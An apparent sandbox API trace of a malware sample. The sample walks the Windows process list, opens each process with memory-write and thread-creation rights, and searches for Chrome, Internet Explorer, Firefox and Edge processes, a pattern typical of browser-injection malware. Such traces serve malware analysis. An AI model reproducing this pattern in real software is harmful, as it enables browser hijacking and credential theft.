	[0223.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0223.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x57ec
	[0223.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.776] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.777] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.777] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.778] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x57f0
	[0223.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.780] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.780] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.781] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.781] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0223.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x57f4
	[0223.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.782] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0223.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.783] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.783] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0223.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.784] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x57f8
	[0223.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.785] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.785] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.785] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.786] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0223.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x57fc
	[0223.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.787] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0223.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.787] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.787] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0223.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.788] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0223.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5804
	[0223.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.789] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0223.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.789] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.789] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0223.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.790] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0223.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5808
	[0223.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.791] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0223.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.791] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.791] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0223.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.792] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.792] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0223.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x580c
	[0223.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.793] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.794] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.794] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.794] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5810
	[0223.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.795] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.796] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.796] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.796] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5814
	[0223.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.797] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.797] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.798] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.799] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5818
	[0223.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.800] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.800] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.800] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.801] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x581c
	[0223.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.802] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5820
	[0223.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.804] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.804] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.804] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.805] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.805] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5824
	[0223.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.806] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.806] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.806] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.807] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5828
	[0223.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.808] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.808] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.808] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.809] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.809] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0223.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x582c
	[0223.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.810] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0223.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.810] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.810] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0223.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.811] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.811] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5830
	[0223.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.813] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.813] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.814] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.814] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.815] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0223.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5834
	[0223.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.816] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.816] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.816] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.817] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5838
	[0223.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.818] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.818] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.818] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.819] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.819] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x583c
	[0223.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.820] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.820] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.820] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.821] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.821] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5840
	[0223.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.822] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.822] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.822] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.823] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0223.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5844
	[0223.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.824] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0223.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.824] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.824] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0223.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.825] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.825] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0223.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5848
	[0223.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.826] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.826] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.826] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.827] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.827] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0223.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x584c
	[0223.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.827] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0223.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.828] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.828] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0223.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.828] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.829] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0223.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0223.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0223.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5850
	[0223.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.831] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
